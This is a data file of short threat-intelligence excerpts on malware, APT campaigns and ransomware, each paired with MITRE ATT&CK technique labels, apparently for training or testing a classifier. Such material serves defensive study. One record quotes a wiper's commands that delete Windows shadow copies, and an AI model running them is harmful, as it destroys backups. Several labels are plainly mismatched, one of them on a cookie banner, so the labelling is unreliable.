{"text1":"It also moves the JS file to \u2018Shell.NameSpace(28)\u2019 (\u2018ssfLOCALAPPDATA\u2019 \u2013 \u2018\\AppData\\Local\u2019) and creates a scheduled task to use WScript to execute the file at every user log on. The installation routine then copies the keylogger to the registry, sets the uid + 0 flag to 1 to indicate that installation was completed, and executes the scheduled task it created","labels":"['T1053.005']"}
{"text1":"BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime","labels":"['T1059.004']"}
{"text1":"Then, the malware loads an executable file from WM_DSP resource and runs a shellcode that contains approximately1500 bytes (after decrypting it with XOR 0x45","labels":"['T1140']"}
{"text1":"Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky\u2019s inclusion of ProcDump in the BabyShark malware. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51(link is external","labels":"['T1204.002', 'T1555.003']"}
{"text1":"The impact of finding this implant on your network is severe and most likely indicates the presence of other footholds or compromised systems. This backdoor provides ample capability for the attacker to propagate and compromise other hosts and critical data using this as a very stealthy beachhead","labels":"['T1556.004']"}
{"text1":"InvisiMole is capable of scanning enabled wireless networks on the compromised system. It records information such as the SSID and MAC address of the visible Wi-Fi access points","labels":"['T1016']"}
{"text1":"Besides the stolen data, it sends the Windows product name and version, username, computer name, and domain name to the C&C server","labels":"['T1082']"}
{"text1":"The implant has the capability of gathering data from the victim\u2019s system. The following information will be gathered and sent to the command and control server","labels":"['T1560.002']"}
{"text1":"The threat actors also collected the files \u201cntds.dit\u201d and the \u201cSYSTEM\u201d registry hive. DHS observed the threat actors compress all of these files into archives named \u201cSYSTEM.zip\u201d and \u201ccomps.zip","labels":"['T1560']"}
{"text1":"Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok","labels":"['T1189', 'T1203']"}
{"text1":"Quickly after the initial compromise, the operator deploys a tool named \"dog.exe. This malware is written in .NET and its purpose is to monitor hard drive paths and to exfiltrate the information via an email account or an FTP, depending on the configuration. The configuration file is named dconf.json","labels":"['T1048']"}
{"text1":"Stealth Falcon demonstrates some familiarity with the patterns of behavior, interests, and activities of its targets, suggesting that the operators may have been working with other sources of information about their targets\u2019 behaviors. In addition, Stealth Falcon displayed above-average operational security throughout the campaign. Stealth Falcon also shows familiarity with creating and maintaining a range of fictitious personas, and registering and managing a significant amount of attack and C2 infrastructure with concern for operational security","labels":"['T1041']"}
{"text1":"The malware families used in this campaign consisted mainly of malicious documents featuring CARROTBAT downloaders with SYSCON payloads, but also included a new malware downloader Unit 42 has dubbed CARROTBALL","labels":"['T1204.002']"}
{"text1":"Upon execution, the payload injects into iexplore.exe process and starts encrypting text files and documents of the victim machine","labels":"['T1055']"}
{"text1":"GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool","labels":"['T1568.002']"}
{"text1":"Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts","labels":"['T1078']"}
{"text1":"The Gamaredon group uses a package that includes a custom Microsoft Outlook Visual Basic for Applications (VBA) project. Using Outlook macros to deliver malware is something we rarely see while investigating malicious campaigns","labels":"['T1106', 'T1218.011', 'T1120', 'T1059.005']"}
{"text1":"Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon","labels":"['T1071.001']"}
{"text1":"Proofpoint researchers frequently observe Silent Librarian\u2019s phishing attempts originating from a university unrelated to their current target using a separate, unrelated university\u2019s URL shortening service. This short URL links to a phishing landing page either directly or via one or more third-party sites that eventually lands the user on a clone of a login portal hosted on an actor-controlled server","labels":"['T1588.002', 'T1598.003', 'T1608.005']"}
{"text1":"The functional payload is a DLL compiled on 2019-03-11 02:23:54, which has two functionalities depending if the binary has a command line argument -daemon or -worker passed to it. The daemon functionality handles the C2 communications portion of the Trojan, which is configured to communicate with 185.12.45[.]134 over HTTPS using the following URL","labels":"['T1071.001']"}
{"text1":"An official website of the United States government . Here\u2019s how you know . Official websites use .gov A .gov website belongs to an official government organization in the United States. Secure .gov websites use HTTPS A lock (LockA locked padlock) or https:\/\/ means you\u2019ve safely connected to the .gov website. O\u2019Reilly of the Defense Criminal Investigative Service (DCIS) of the U.S. Among other things, Zhu and Zhang registered IT infrastructure that the APT10 Group used for its intrusions and engaged in illegal hacking operations. The indictment alleges that the defendants were part of a group that hacked computers in at least a dozen countries and gave China\u2019s intelligence service access to sensitive business information,\u201d said Deputy Attorney General Rosenstein. It's going to take all of us working together to protect our economic security and our way of life, because the American people deserve no less. The APT10 Group used some of the same online facilities to initiate, facilitate and execute its campaigns during the conspiracy. Earlier, beginning in or about 2006, members of the APT10 Group, including Zhu and Zhang, engaged in an intrusion campaign to obtain unauthorized access to the computers and computer networks of more than 45 technology companies and U.S. To avoid antivirus detection, the malware was installed using malicious files that masqueraded as legitimate files associated with the victim computer\u2019s operating system. Such malware enabled members of the APT10 Group to monitor victims\u2019 computers remotely and steal user credentials","labels":"['T1199']"}
{"text1":"The Iranian attacker group (APT35) and the Chinese attacker group (APT31) targeted campaign staffers\u2019 personal emails with credential phishing emails and emails containing tracking links. As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns","labels":"['T1598']"}
{"text1":"PLEAD and KIVARS, for instance, share the use of RTLO techniques to disguise their installers as documents. Both also use decoy documents to make the RTLO attack more convincing. Another similarity is the use of a small loader component to load encrypted backdoors into memory","labels":"['T1204.002']"}
{"text1":"Nyetya requires user credentials to spread itself laterally via the PsExec and WMI vectors (which are detailed in the \"Malware Functionality\" section). Talos has identified three ways Nyetya can obtain these credentials. First, credentials can be manually passed in via a command line argument","labels":"['T1078.003']"}
{"text1":"Often service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged on to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden Tickets","labels":"['T1550.003']"}
{"text1":"Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence","labels":"['T1190']"}
{"text1":"The touch utility sets the modification and access times of files. If any file does not exist, it is created with default permissions. This makes the utility useful to malware in two common scenarios: for creating an empty file at a given path that is later passed data, and\/or for changing the timestamp on a file as a means of evasion, also known as \u201ctimestomping","labels":"['T1222.002']"}
{"text1":"For the rest, we acknowledge that the subdomains used could be indicative of the target; they could also be used to go after third parties that might trust those organizations","labels":"['T1583.001']"}
{"text1":"Both backdoors target Arabic-speaking users. They use code that checks if the compromised machine has the Arabic language installed","labels":"['T1614.001', 'T1614.001']"}
{"text1":"Digital delivery of over 3,000 APT1 indicators, such as domain names, and MD5 hashes of malware. Thirteen (13) X.509 encryption certificates used by APT1. A set of APT1 Indicators of Compromise (IOCs) and detailed descriptions of over 40 malware families in APT1's arsenal of digital weapons. IOCs that can be used in conjunction with\u00a0Redline\u2122, Mandiant's free host-based investigative tool, or with\u00a0Mandiant Intelligent Response\u00ae (MIR), Mandiant's commercial enterprise investigative tool","labels":"['T1036.005']"}
{"text1":"Doki uses a previously undocumented method to contact its operator by abusing the Dogecoin cryptocurrency blockchain in a unique way in order to dynamically generate its C2 domain address. The malware has managed to stay under the radar for over six months despite samples being publicly available in VirusTotal","labels":"['T1102']"}
{"text1":"Using job opportunities as template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as LockHeed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. Targeting the defense industry and specifically Lockheed Martin is a known target for this actor","labels":"['T1566.001']"}
{"text1":"Since this malicious extension is trying to pass for a legitimate Chrome plugin, Grandoreiro\u2019s developer named it \u201cGoogle Plugin\u201d version 1.5.0. Visually, it adds a square button to the browser window instead of the \u201ccookie\u201d button on the original plugin","labels":"['T1176']"}
{"text1":"Before writing a keystroke to the log, the malware obtains the current locale identifier using the \u2018GetKeyboardLayout\u2019 API. The retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429","labels":"['T1614.001']"}
{"text1":"According to the public source data, these airlines use services of the same IT service provider. To help companies detect and hunt for ColunmTK, we have provided a full list of indicators of compromise (IOCs) that we retrieved. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. APT41, also known as WICKED SPIDER (PANDA), Winnti Umbrella, and BARIUM, is believed to have been engaging in state-sponsored espionage in China's interests as well as committing financially motivated cybercrimes. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. Source: Group-IB Threat Intelligence & Attribution Another interesting domain is service[.]dns22[.]ml. In both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry","labels":"['T1543.003']"}
{"text1":"FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production","labels":"['T1110.003']"}
{"text1":"Given Lazarus\u2019 use of a wide array of tools and techniques in their operations, it\u2019s reasonable to assume that the group will continue to use ever-evolving tactics in their malicious activities. Overall, an organization will need multilayered security strategies, as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses","labels":"['T1189']"}
{"text1":"After the wiping procedure, the malware tries to delete the shadow copies by running the following commands: vssadmin.exe delete shadows \/all \/quiet **and **C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe shadowcopy delete. Finally, the malware enters an infinite loop where it sleeps based on the is_alive_loop_interval value from the configuration file and writes \"Meteor is still alive","labels":"['T1047']"}
{"text1":"As can be seen above, the script gathers OS version, a session UID and machine ID, all of which it posts to the server for processing","labels":"['T1082']"}
{"text1":"According to the public source data, these airlines use services of the same IT service provider. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. It took the attackers 24 hours and 5 minutes to spread Cobalt Strike beacons to other devices in the airline's network. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. The files are very similar in the way they launch a DLL file as a service and create keys in the registry","labels":"['T1569.002']"}
{"text1":"Additionally, the attackers used a genuine code-signing certificate issued to a Cyprus-based company called Hermetica Digital Ltd","labels":"['T1553.002']"}
{"text1":"We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you\u2019ve provided to them or that they\u2019ve collected from your use of their services. This is beneficial for the website, in order to make valid reports on the use of their website.Expiry: PersistentType: HTMLrc::cThis cookie is used to distinguish between humans and bots. Expiry: SessionType: HTMLKaspersky Lab2Learn more about this providertest\u00a0[x2]Used to detect if the visitor has accepted the marketing category in the cookie banner. Expiry: SessionType: HTTPMarketo2Learn more about this provider__cf_bmThis cookie is used to distinguish between humans and bots. Expiry: 2 yearsType: HTTP25 Marketing cookies are used to track visitors across websites. This can be used for marketing purposes. This is used in context with the email marketing service Marketo.com, which allows the website to target visitors via email","labels":"['T1078']"}
{"text1":"Use automated methods, such as scripts, for collecting data (Automated Collection [T1119]) - Capture user input to obtain credentials and collect information (Input Capture [T1056]) - Collect local systems data from a compromised system (Data from Local System [T1005]) - Take screen captures of the desktop (Screen Capture [T1113]) - Collect data stored in the Windows clipboard from users (Clipboard Data [T1115","labels":"['T1005']"}
{"text1":"A service DLL (loaded by svchost.exe) with a ServiceMain function typically named NetSetupServiceMain - A standard non-Service DLL loaded by rundll32.exe","labels":"['T1558.003']"}
{"text1":"OSX\/Keydnap uses a Tor2Web proxy for command and control. An installed launch agent, icloudproc, is automatically started by the OS, and listens on 127.0.0.1:9050. As noted by ESET, the main backdoor component (icloudsyncd) uses this proxy for communication purposes: \u201cKeydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server","labels":"['T1543.001']"}
{"text1":"Communication over DNS tunnel with a hardcoded domain name and DGA-generated subdomain - C2 traffic encrypted with RSA-2048 - Custom AES-encrypted storage format used to store configuration, plugins, and harvested data - Unique version number for each sample","labels":"['T1071.004', 'T1027']"}
{"text1":"Volexity is seeing active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal e-mail and compromise networks. In January 2021, through its Network Security Monitoring service, Volexity detected anomalous activity from two of its customers' Microsoft Exchange servers. This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. Additionally, Volexity is providing alternative mitigations that may be used by defenders to assist in securing their Microsoft Exchange instances. This vulnerability has been confirmed to exist within the latest version of Exchange 2016 on a fully patched Windows Server 2016 server. Volexity also confirmed the vulnerability exists in Exchange 2019 but has not tested against a fully patched version, although it believes they are vulnerable. There are two methods to download e-mail with this vulnerability, depending on the way that Microsoft Exchange has been configured. In the case where a single server is being used to provide the Exchange service, Volexity believes the attacker must know the targeted user\u2019s domain security identifier (SID) in order to access their mailbox. Further other notable User-Agent entries tied to tools used for post-exploitation access to webshells. Network Indicators - Attacker IPs . Volexity has observed numerous IP addresses leveraged by the attackers to exploit the vulnerabilities described in this blog","labels":"['T1190']"}
{"text1":"The analyzed sample of NotPetya encrypts the compromised system\u2019s files with a 128-bit Advanced Encryption Standard (AES) algorithm during runtime. The malware then writes a text file on the \u201cC:\\\u201d drive that includes a static Bitcoin wallet location as well as unique personal installation key intended for the victim to use when making the ransom payment and the user\u2019s Bitcoin wallet ID. NotPetya modifies the master boot record (MBR) to enable encryption of the master file table (MFT) and the original MBR, and then reboots the system. Based on the encryption methods used, it appears unlikely that the files could be restored, even if the attacker received the victim\u2019s unique key and Bitcoin wallet ID","labels":"['T1486']"}
{"text1":"The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. When the user double-clicks the file, they are presented with a decoy message box. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer","labels":"['T1555.003']"}
{"text1":"To achieve privilege escalation within the environment, FIN6 utilized a named pipe impersonation technique included within the Metasploit framework that allows for SYSTEM-level privilege escalation","labels":"['T1134']"}
{"text1":"It then calls the API EnumWindows() function to enumerate\u00a0all windows from the victim\u2019s system. Its EnumFunc() callback function collects all windows titles and then adds a 14H long random string prefix. One mixed windows title looks like this: \u201c{14H long random string}+windows title\u201d. All the mixed windows titles are added into a string list box control","labels":"['T1010']"}
{"text1":"As my analysis in the previous blog showed, Agent Tesla is a spyware. It monitors and collects the victim\u2019s keyboard inputs, system clipboard, screen shots of the victim\u2019s screen, as well as collects credentials of a variety of installed software. So far, through my quick analysis, this version is similar to the older one","labels":"['T1082']"}
{"text1":"We\u2019ve seen the adversary staging data on a remote system or on the local system. Most of the times the data is compressed and copied at the same time. Only a handful of times the adversary copies the data first before compressing (archive collected data) and exfiltrating it. The adversary compresses and encrypts the data by using WinRAR from the command-line","labels":"['T1124']"}
{"text1":"A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system","labels":"['T1566.001', 'T1566.001']"}
{"text1":"PACT has reverse engineered the DGA, dynamically analyzed the malware, investigated the Threat Actor\u2019s (TA) web-based infrastructure, and consolidated the results of our analysis into the following report","labels":"['T1070.004']"}
{"text1":"From September to December 2018 the RTM group sent out more than 11,000 malicious emails. The cybercriminals, however, are not going to stop there, as evidenced by the new malicious campaigns that we track as part of our ongoing threat intelligence activities. Where do we begin our search. Let's start with simple things: we will take the NTUSER.DAT registry file with the latest modification date from the user directory (C:\\Users\\%username%\\), and extract data from it using RegRipper. In general, you do not have to stick to the Sleuth Kit at all; there are more convenient tools like FTK Imager, a free tool, which can be used not only to create forensic images, but also to examine their contents. Let's take a closer look at apg.exe and use PPEE: This looks like TeamViewer and is signed as TeamViewer, so does this mean it indeed is TeamViewer. Judging by the file's size, it has nothing to do with the original msi.dll, so it is clearly DLL Search Order Hijacking. The operating system starts searching for the necessary libraries from the current directory, which means that instead of the legitimate msi.dll, the one located in b7mg81 will be loaded. Another interesting file is TeamViewer.ini: Here is anti-forensics: according to the configuration file, our \"TeamViewer\" did not keep any logs, and was apparently used as a RAT (Remote Access Trojan). Well, not bad. I think what we can use the Sleuth Kit again","labels":"['T1574.001']"}
{"text1":"The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach. The scripts retrieve the attackers\u2019 payloads using psexec or certutil","labels":"['T1105', 'T1569.002', 'T1059.003']"}
{"text1":"Note that the browser itself is not hooked. Executing the browser from any other Chrome shortcut link will start and run it normally without the malicious extension, canceling out the malware\u2019s ability to control what the victim does","labels":"['T1547.009']"}
{"text1":"The Epic backdoors are commanded by a huge network of hacked servers that deliver command and control functionality","labels":"['T1049']"}
{"text1":"Capture current screen (screenshot) and save screenshot as a JPEG to \"C:\\ProgramData\\tsc\". The contents of the file are subsequently read and sent to the C2. Code to capture a screenshot as bitmap and save to file","labels":"['T1113']"}
{"text1":"Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Attackers have been making use of this exploit in the wild since at least April 17. Initial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. The attackers are downloading the Sodinokibi ransomware. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a phishing domain, and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident. Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136","labels":"['T1105']"}
{"text1":"Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers","labels":"['T1071.001']"}
{"text1":"The attackers dropped Visual Basic and PowerShell scripts in folders that they created under the ProgramData (a hidden folder, by default). The attackers created persistence using Windows\u2019 registry, services and scheduled tasks. This persistence mechanism ensured that the loader scripts would execute either at startup or at predetermined intervals","labels":"['T1053.005', 'T1547.001']"}
{"text1":"ESET researchers have discovered several previously undocumented post-compromise tools used by the highly active Gamaredon threat group in various malicious campaigns. One tool, a VBA macro targeting Microsoft Outlook, uses the target\u2019s email account to send spearphishing emails to contacts in the victim\u2019s Microsoft Office address book. We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents","labels":"['T1039', 'T1204.002', 'T1534', 'T1083']"}
{"text1":"We have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server","labels":"['T1083']"}
{"text1":"Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. BlackEnergy2 was eventually seen downloading more crimeware plugins \u2013 a custom spam plugin and a banking information stealer custom plugin. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called \u201cSandworm Team\u201d also","labels":"['T1082']"}
{"text1":"dellLemb||> deletes the registry key \\Software\\Microsoft\\Internet Explorer\\notes. EXECPROGAM calls ShellExecute to run the application given in the command. NOVOLEMBRETE creates and stores data sent with the command in the registry key \\Software\\Microsoft\\Internet Explorer\\notes","labels":"['T1070']"}
{"text1":"Check for Skype connectivity - Download and install Skype - Encoded communication with its C2 - Execute commands sent from the C2 server - Get multifactor authentication settings - Get the currently logged on user and OS version","labels":"['T1132.001']"}
{"text1":"The fourth-stage wiper starts off by enumerating from A to Z, looking for fixed and remote logical drives in the system. Enumerates logical drives. For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the \"%HOMEDRIVE%\\Windows\" directory","labels":"['T1049', 'T1082']"}
{"text1":"1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant","labels":"['T1036.007']"}
{"text1":"WMIC (wmic.exe) was used to create a remote command prompt instance (cmd.exe), which then executed the PowerShell code. The PowerShell command created two variables and attempted to download and execute the payload from one of FIN8\u2019s Command and Control (C&C) servers. This download was blocked by Bitdefender \u2013 below description is based on interpretation of variables discovered in our previous analysis of FIN8 operations","labels":"['T1059.001', 'T1105', 'T1059.003']"}
{"text1":"mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. This process runs as a high-integrity process by default, since its set to auto-elevate within its manifest","labels":"['T1134.002']"}
{"text1":"After downloading the executable payload, the secondary VBScript runs the following command on the command line (T1059) to kill any existing msiexec.exe process instances and use the ping application to sleep for two seconds before using the legitimate msiexec.exe application (T1218) to launch the downloaded PlayerVLC.msi file","labels":"['T1105']"}
{"text1":"In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams. This knowledge is reflected in the actor\u2019s operational decisions, from the choice of command-and-control (C2) infrastructure to the naming of scheduled tasks used to maintain persistence","labels":"['T1053.005']"}
{"text1":"Once elevated, the ransomware will write a copy of a random file from System32 to the %APPDATA% directory. The newly copied file will have a random and hidden filename. This process allows for the ransomware to copy itself into the file by way of an alternate data stream (ADS","labels":"['T1564.004']"}
{"text1":"The Trojan sends an email to sahro.bella7[at]post.cz with sysscr.ops as the attachment, the string SCreen within the body and a subject with the unique system identifier via SMTPS from one of three previously used accounts. If the actor wishes to download an additional payload to the compromised host, they will respond by sending emails in the following steps. 3) The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as a subject with a secondary email account and credentials in ASCII hexadecimal format within the message body. This secondary email account is unknown at this time, so we will refer to it as \"secondary email account\" in future steps. 4) The actor sends an email to the secondary email account with the unique system identifier as a subject with a secondary payload attached with a filename of txt. Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the secondary email account. 7) The actor sends an email to\u00a0trala.cosh2[at]post.cz with the unique system identifier as a subject with a file path that the Cannon Trojan will use to save the secondary payload. 8) Cannon logs into the secondary email account via POP3S looking for emails with a subject that matches the unique system identifier. Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded auddevc.txt file. 12) Cannon moves the downloaded file to the specified path","labels":"['T1105']"}
{"text1":"Another relationship we have mentioned repeatedly is the use of the SYSCON malware family. This particular malware family was first reported in October 2017 and has been observed delivering decoy documents pertaining to North Korea. The malware is generally unsophisticated, making use of remote FTP servers for C2 communication","labels":"['T1071.002']"}
{"text1":"It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests","labels":"['T1071.001']"}
{"text1":"This backdoor adds the following registry entries to enable its automatic execution at every system startup","labels":"['T1547.001', 'T1547.001']"}
{"text1":"Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling \"PoetRAT. The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operation. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically","labels":"['T1056.001']"}
{"text1":"The batch-files appear to be used to load the Cobalt Strike beacon, but also to perform discovery commands on the compromised system","labels":"['T1059.003']"}
{"text1":"The actor has distributed its dropper embedded in an archive file (\uc678\uad50\ubd80 \uac00\ud310 2021-05-07.zip) as an attachment through spearphishing emails. The archive file contains a JavaScript file (\uc678\uad50\ubd80 \uac00\ud310 2021-05-07.pdf.jse) which pretends to be a PDF file that contains two Base64 encoded blobs. The first one is the content of the decoy PDF file in Base64 format and the other one contains the AppleSeed payload also in Base64 format (encoded twice","labels":"['T1204.002', 'T1027']"}
{"text1":"The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. The type of data this implant gathers from the victim\u2019s system","labels":"['T1016', 'T1012']"}
{"text1":"Collected files under the preliminary collection directory will be compressed using a WinRAR instance that the Ramsay Installer drops. This compressed archive will be saved within the preliminary collection directory and then generate a Ramsay container artifact","labels":"['T1083', 'T1560.001']"}
{"text1":"As discussed in the delivery document\u00a0analysis above,\u00a0depending on the OS architecture either of the embedded\u00a0KerrDown\u00a0DLLs\u00a0will be dropped in the victim machine. The\u00a0DLL\u00a0is dropped in the directory location \u2018Users\\Administrator\\AppData\\Roaming\\\u2019\u00a0as \u2018main_background.png\u2019.\u00a0The DLL retrieves the payload from\u00a0the\u00a0URL, decrypts it by using DES algorithm and\u00a0execute it\u00a0in\u00a0the\u00a0memory. Therefore, it is observed that only the\u00a0KerrDown\u00a0DLL\u00a0downloader is saved in the system and the payload directly gets executed in the memory without being written in the system. Table\u00a01\u00a0shows the\u00a0URL\u00a0the downloader will attempt to download the payload from depending on the\u00a0OS architecture of the victim machine","labels":"['T1105']"}
{"text1":"To exploit the Log4j vulnerability (CVE-2021-44228), the attackers chose one of the publicly available open-source JNDI Exploit Kits, since removed from GitHub due to its enormous popularity following the vulnerability emergence. There are multiple analysis papers that explain how the vulnerability can be exploited, so we will skip the details of the actual exploitation step","labels":"['T1190']"}
{"text1":"List of installed antivirus products - OS version - Username - Computer name - Whether any of the following software is installed: Diebold Warsaw GAS Tecnologia (an application to protect access to online banking) Trusteer Several Latin American banking applications - Diebold Warsaw GAS Tecnologia (an application to protect access to online banking) - Trusteer - Several Latin American banking applications","labels":"['T1518.001']"}
{"text1":"All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware","labels":"['T1573.001']"}
{"text1":"HELLOKITTY is written in C++, but reimplements a significant portion of DEATHRANSOM's functionality using similar loop operations and thread pooling via QueueUserWorkItem. The code structure to enumerate network resources, logical drives, and perform file encryption is very similar. Additionally, HELLOKITTY and DEATHRANSOM share very similar functions to check for the completion status of their encryption threads before exiting","labels":"['T1082', 'T1135']"}
{"text1":"In our tests, running Valak from a U.S. location on a vulnerable Windows 10 host returned a banking Trojan called IcedID as the follow-up malware. In one case, we saw both IcedID and NetSupport Manager RAT-based malware delivered as follow-up malware on a Windows 7 host from June 2020","labels":"['T1105']"}
